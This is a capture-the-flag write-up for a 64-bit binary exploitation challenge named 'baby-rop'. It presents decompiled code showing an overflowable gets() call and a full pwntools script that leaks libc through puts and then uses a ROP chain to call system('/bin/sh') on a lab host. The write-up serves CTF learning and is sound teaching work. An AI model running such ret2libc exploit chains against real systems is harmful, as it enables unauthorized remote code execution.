Binary Exploitation

Challenge	Link
baby-rop (100 pts)	Here

baby-rop (100 pts)

Description

-

Solution

Given ELF 64 bit, open it using IDA.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  v3 = time(0LL);
  srand(v3);
  login_user();
  return 0;
}

From main function we know that there are some function called, lets take a look on login_user (because other function are originated from library).

int login_user()
{
  char v1[48]; // [rsp+0h] [rbp-40h] BYREF
  int v2; // [rsp+30h] [rbp-10h]

  puts("== Welcome to the TurboLike v1.0 login portal ==");
  puts("Tell me your name and I will tell you your uid!");
  puts("Just don't tell me your name is admin, that would be too easy ;)");
  printf("Name: ");
  v2 = rand();
  gets(v1);
  printf("Hello, %s your uid is %d!\n", v1, v2);
  if ( v2 != 1337 )
    return puts("You are not admin!");
  puts("Welcome back admin! Tell me your secret and I will store it for you!");
  return store_secret();
}

In login_user function we can see that there is vulnerable function which is gets. In this case we can overflow the v1 variable and control the execution flow. Because the objective is gaining remote code execution, so the flow is leak the libc address then popping shell using system function. Below is the script to solve the challenge

#!usr/bin/python3
from pwn import *

exe = './vuln_patched'
elf = context.binary = ELF(exe, checksec=True)

ld = ELF("./ld-2.39.so")

rop = ROP(elf)
libc = './libc.so.6'
libc = ELF(libc, checksec=False)

# context.log_level = 'debug'
context.terminal = ["tmux", "splitw", "-h", "-l", "65%"]

host, port = '10.104.16.2', 5015

def initialize(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.RM:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
b *0x4012A7
'''.format(**locals())

def exploit():
    global r
    r = initialize()
    r.recvuntil(b"Name: ")
    POP_RDI = 0x00000000004011fe
    PUTS_GOT = elf.got['puts']
    PUTS_PLT = elf.symbols['puts']
    OFFSET = b"a" * 0x48
    MAIN_PLT = 0x4012FC
    payload = OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    r.sendline(payload)
    r.recvuntil(b" admin!\n")
    leak = u64(r.recvline().strip().ljust(8, b"\x00"))
    libc.address = leak - libc.symbols['puts']
    print(hex(libc.address))
    r.recvuntil(b"Name: ")
    system = libc.symbols['system']
    sh =  next(libc.search(b'/bin/sh'))
    payload = OFFSET + p64(POP_RDI) + p64(sh) + p64(0x000000000040101a) +  p64(system)
    r.sendline(payload)
    r.interactive()
    
if __name__ == '__main__':
    exploit()

Flag: CBC{hex_value}